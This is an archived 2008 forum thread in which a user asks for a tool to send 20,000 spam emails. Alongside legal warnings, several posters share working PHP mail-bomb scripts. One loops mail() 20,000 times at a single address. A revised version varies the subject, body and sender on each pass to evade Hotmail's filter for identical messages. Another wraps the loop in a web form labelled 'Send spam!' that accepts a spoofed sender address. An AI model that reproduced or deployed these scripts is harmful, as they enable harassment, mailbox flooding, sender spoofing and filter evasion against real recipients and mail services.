PDA

View Full Version : Spam emails



GoldenMerc
29-09-2008, 04:40 PM
Does anyone have the download for a like spam email to send like 20k emails at a time?
Ross

Jordy
29-09-2008, 05:11 PM
I hate to be a killjoy but if you send this from a US Based Server you could face prison and around $100 fine per email sent. Not only that but your hosting will almost certainly be terminated as soon as the host finds out, even if your not caught by the law.

You'd also need a very well compiled list of emails and a very good hosting package to be able to do this, not only that but you'd need very good software which would send a controlled amount at a time.

It's very difficult to send 20k of emails from a server, it would also take a long time.

Spam is usually sent through botnets (Thousands of computers which have virus's, controlled by 1 computer). It's difficult to get into the Botnet circulation, expensive, and also it's very much against the law, prison is likely.

http://en.wikipedia.org/wiki/Botnet

MrCraig
30-09-2008, 03:54 PM
LOL i once made something like that for someone ;p

He crashed school network :rolleyes:

Its really easy if your just doing it to one email, Like bruting the email almost:



<?php

$to = "[email protected]"; #Sending emails to
$from = "[email protected]"; #Reply address
$body = "Message text"; #Message body
$num = "20000"; #number of times to send message
$subject = "Haha!"; #subject of email

for($i=0;$i<=$num;$i++)
{
mail($to,$subject,$body,"From: <$from>");
}

echo("Sending complete. Ross smells.");
?>


But ye, as said your gonna get mauled if caught. :)

L?KE
30-09-2008, 06:14 PM
What happened if I sent my mate like 40k emails to his personal email, just him.

Still illegal?

--ss--
30-09-2008, 06:19 PM
Hotmail block mass identical emails now :(

MrCraig
30-09-2008, 06:36 PM
Hotmail block mass identical emails now :(



<?php

$to = "[email protected]"; #Sending emails to
$from = "[email protected]"; #Reply address
$body = "Message text"; #Message body
$num = "20000"; #number of times to send message
$subject = "Haha!"; #subject of email

for($i=0;$i<=$num;$i++)
{
$subject .= $i;
$body .= $i;
$from .= $i;
mail($to,$subject,$body,"From: <$from>");
}

echo("Sending complete. Ross smells.");
?>
easy fix? :P

Flisker
30-09-2008, 08:00 PM
And if that host catches you doing that the host WILL terminate your account without a doubt and possibly fine you. check the Terms of Service.

*whistles*

Kevin
30-09-2008, 08:03 PM
And if that host catches you doing that the host WILL terminate your account without a doubt and possibly fine you. check the Terms of Service.

*whistles*

nice dig there chris :P, sawhosting.com ftw

Flisker
30-09-2008, 09:01 PM
nice dig there chris :P, sawhosting.com ftw
Thanks haha :P I'm glad someone got what I was saying :P

Kevin
30-09-2008, 09:16 PM
Thanks haha :P I'm glad someone got what I was saying :P

I can do science me! :8;)

Hypertext
01-10-2008, 01:59 AM
And if that host catches you doing that the host WILL terminate your account without a doubt and possibly fine you. check the Terms of Service.

*whistles*

What a damn whistleblower. Har har. I make myself laugh =]

J0SH
01-10-2008, 04:04 AM
They're called Mail Bombers and I don't recommend using them :P

Jord
01-10-2008, 05:17 AM
Hope you use it and get fined.

Calon
01-10-2008, 07:51 PM
index.php


<form action="mail.php" method="post">
<font face="Trebuchet MS" size="2">This mailer sends 200 emails to the address you specify!<br /><br />
Too (Send your mail too): <input type="text" name="mailer" /><br />
From (Who you are, or anonymus?): <input type="text" name="from" /><br />
Body (Content of the email): <input type="text" name="body" /><br />
Subject ("Email Title"): <input type="text" name="subject" /><br />
<input type="submit" name="submit" value="Send spam!" />
</font>
</form>

mail.php

<?php

$youremail = "youremail";

if($_POST["mailer"] == $youremail) {
echo( 'Nice try maan.' );
exit();
}
if($_POST["from"] == $youremail) {
echo( 'Nice try maan.' );
exit();
}

$to = $_POST["mailer"];
$from = $_POST["from"];
$body = $_POST["body"];
$num = 200;
$subject = $_POST["subject"];

for($i=0;$i<=$num;$i++)
{
mail($to,$subject,$body,"From: <$from>");
}

echo( 'Sending complete.' );
?>


I made something out of Craig's script. Enjoy :P

Want to hide these adverts? Register an account for free!